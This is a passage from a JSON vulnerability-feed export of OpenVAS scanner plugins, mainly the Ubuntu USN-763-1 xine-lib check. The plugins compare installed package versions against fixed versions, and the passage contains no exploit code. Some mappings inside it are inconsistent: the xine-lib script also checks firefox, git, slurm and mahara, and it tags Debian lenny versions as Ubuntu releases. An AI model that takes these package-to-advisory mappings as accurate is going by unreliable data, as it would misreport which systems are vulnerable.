res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-powerpc-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-powerpc-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-s390x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-s390x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-s390x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-s390\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-s390\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-s390-tape\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-s390x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-s390\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-sparc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sparc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sparc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nsd\", ver:\"2.3.7-1.1+lenny1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nsd3\", ver:\"3.0.7-3.lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"racoon\", ver:\"0.7.1-1.3+lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ipsec-tools\", ver:\"0.7.1-1.3+lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-doc\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-server\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-simple\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntpdate\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-refclock\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-doc\", ver:\"4.2.4p4+dfsg-6ubuntu2.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp\", ver:\"4.2.4p4+dfsg-6ubuntu2.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntpdate\", ver:\"4.2.4p4+dfsg-6ubuntu2.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-doc\", ver:\"4.2.4p4+dfsg-7ubuntu5.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp\", ver:\"4.2.4p4+dfsg-7ubuntu5.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntpdate\", ver:\"4.2.4p4+dfsg-7ubuntu5.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:28:23", "bulletinFamily": "scanner", "description": "The remote host is missing an update to xine-lib\nannounced via advisory USN-763-1.", "modified": "2017-12-01T00:00:00", "published": "2009-06-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64143", "id": "OPENVAS:64143", "title": "Ubuntu USN-763-1 (xine-lib)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_763_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_763_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-763-1 (xine-lib)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n libxine-main1 1.1.1+ubuntu2-7.12\n\nUbuntu 8.04 LTS:\n libxine1 1.1.11.1-1ubuntu3.4\n\nUbuntu 8.10:\n libxine1 1.1.15-0ubuntu3.3\n\nAfter a standard system upgrade you need to restart applications linked\nagainst xine-lib, such as Totem-xine and Amarok, to effect the necessary\nchanges.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-763-1\";\n\ntag_insight = \"It was discovered that the QT demuxer in xine-lib did not correctly handle\na large count value in an STTS atom, resulting in a heap-based buffer\noverflow. If a user or automated system were tricked into opening a\nspecially crafted MOV file, an attacker could execute arbitrary code as the\nuser invoking the program. (CVE-2009-1274)\n\nUSN-746-1 provided updated xine-lib packages to fix multiple security\nvulnerabilities. The security patch to fix CVE-2009-0698 was incomplete.\nThis update corrects the problem.\n\nOriginal advisory details:\n It was discovered that the 4xm demuxer in xine-lib did not correctly\n handle a large current_track value in a 4xm file, resulting in an integer\n overflow. If a user or automated system were tricked into opening a\n specially crafted 4xm movie file, an attacker could crash xine-lib or\n possibly execute arbitrary code with the privileges of the user invoking\n the program. (CVE-2009-0698)\";\ntag_summary = \"The remote host is missing an update to xine-lib\nannounced via advisory USN-763-1.\";\n\n \n\n\nif(description)\n{\n script_id(64143);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-0698\", \"CVE-2009-1274\", \"CVE-2009-0991\", \"CVE-2009-1357\", \"CVE-2009-1301\", \"CVE-2009-0664\", \"CVE-2008-3963\", \"CVE-2008-2079\", \"CVE-2008-4097\", \"CVE-2008-4098\", \"CVE-2008-4456\", \"CVE-2009-0652\", \"CVE-2009-1302\", \"CVE-2009-1303\", \"CVE-2009-1304\", \"CVE-2009-1305\", \"CVE-2009-1306\", \"CVE-2009-1307\", \"CVE-2009-1308\", \"CVE-2009-1309\", \"CVE-2009-1310\", \"CVE-2009-1311\", \"CVE-2009-1312\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-763-1 (xine-lib)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-763-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.1.1+ubuntu2-7.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-main1\", ver:\"1.1.1+ubuntu2-7.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-doc\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-all-plugins\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-plugins\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-bin\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-console\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-dbg\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-misc-plugins\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-x\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-ffmpeg\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-gnome\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-doc\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-all-plugins\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-plugins\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-bin\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-console\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-dbg\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-ffmpeg\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-gnome\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-misc-plugins\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-x\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-arch\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-doc\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitweb\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-svn\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitk\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-email\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-core\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-gui\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"slurm-llnl-doc\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpmi0-dev\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"slurm-llnl\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"slurm-llnl-slurmdbd\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpmi0\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"slurm-llnl-sview\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libslurm13\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"slurm-llnl-basic-plugins-dev\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libslurm13-dev\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"slurm-llnl-basic-plugins\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mahara\", ver:\"1.0.4-4+lenny2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mahara-apache2\", ver:\"1.0.4-4+lenny2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-venkman\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-libthai\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-venkman\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dom-inspector\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-venkman\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dev\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-gnome-support\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"abrowser\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-venkman\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-libthai\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-venkman\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dom-inspector\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-venkman\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"abrowser-3.0-branding\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-branding\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dev\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-gnome-support\", 